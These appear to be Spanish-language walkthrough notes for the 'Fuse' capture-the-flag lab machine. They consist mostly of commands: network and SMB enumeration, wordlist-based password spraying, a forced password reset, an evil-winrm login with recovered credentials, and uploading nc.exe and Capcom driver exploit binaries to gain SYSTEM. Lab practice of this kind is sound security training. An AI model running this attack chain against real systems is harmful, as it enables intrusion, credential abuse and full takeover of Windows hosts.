nmap -A -p- -oA fuse 10.129.2.5 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA fuse 10.129.2.5
nmap -sU -O -p- -oA active-udp 10.129.2.5
nikto -h 10.129.2.5:80
crackmapexec smb 10.129.2.5
smbclient -L 10.129.2.5 -N
rpcclient -U "" 10.129.2.5 -N
enumdomusers
whatweb http://10.129.2.5
Vamos a etc/hosts y agregamos fuse.fabricorp.local
whatweb http://10.129.2.5
Nos dirigimos a http://fuse.fabricorp.local
Creamos un archivo y ponesmo los usuarios que encontramos en la pagina.
crackmapexec smb 10.129.2.5 -u users.txt -p users.txt
cewl -w passwords http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
cat passwords
crackmapexec smb 10.129.2.5 -u users.txt -p passwords --continue-on-success | grep -v -i "failure"
smbpasswd -r 10.129.2.5 -U "bhult"
Creamos una contrasena nueva
crackmapexec smb 10.129.2.5 -u "bhult" -p "cu3rv0x123$"
rpcclient -U "bhult%cu3rv0x123$1" 10.129.2.5
Lo tienes que hacer rapido.
enumdomprinters
Adquirimos los usuarios y los metemos en un archivo
crackmapexec smb 10.129.2.5 -u users -p "fab@s3Rv1ce$1"
crackmapexec winrm 10.129.2.5 -u "svc-print" -p "fab@s3Rv1ce$1"
evil-winrm -i 10.129.2.5 -u "svc-print" -p "fab@s3Rv1ce$1"
whoami /priv
whoami /all
https://github.com/mach1el/htb-scripts/tree/master/exploit-fuse
Hacemos un upload a todos los archivos incluyendo nc.exe
mkdir C:\temp
cd temp
upload EOPLOADDRIVER.exe
upload ExploitCapcom_modded.exe
upload nc.exe
upload netcat.bat
upload shell.exe
.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
.\ExploitCapcom_modded.exe
whoami